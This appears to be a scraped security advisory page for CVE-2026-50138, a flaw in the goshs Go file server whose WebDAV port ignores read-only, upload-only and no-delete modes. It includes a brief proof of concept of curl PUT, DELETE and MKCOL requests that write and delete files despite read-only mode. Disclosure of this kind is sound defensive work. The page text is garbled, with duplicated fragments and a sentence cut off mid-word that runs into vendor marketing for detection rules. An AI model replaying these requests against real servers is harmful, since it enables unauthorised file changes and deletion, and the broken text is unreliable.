WebDAV listener ignores --read-only, --upload-only, and --no-delete mode flags Ecosystem: Go Package: goshs.de/goshs/v2 (github.com/patrickhener/goshs) Affected: /tmp/r/x.txt goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b…
| CVE ID | CVE-2026-50138 |
| Vendor | go |
| Affected Product | goshs.de/goshs/v2 |
| Vulnerability Type | Vulnerability |
| CVSS Score | 8.1 (HIGH) |
| Actively Exploited | ❌ No known exploitation |
| Patch Status | See Vendor Advisory → |
| Reported By | CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories) |
--read-only, --upload-only, and --no-delete mode flags Ecosystem: GoPackage: goshs.de/goshs/v2 (github.com/patrickhener/goshs) Affected: /tmp/r/x.txt goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b admin:pw & curl -u admin:pw -X PUT http://localhost:18000/y.txt --data x
curl -u admin:pw -X PUT http://localhost:18001/y.txt --data x
curl -u admin:pw -X DELETE http://localhost:18001/x.txt
curl -u admin:pw -X MKCOL http://localhost:18001/pwned/
`
and --no-delete` are silently downgraded to "no protection" on the WebDAV port. Any WebDAV client (curl, cadaver, Windows Explorer, Finder) can overSigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.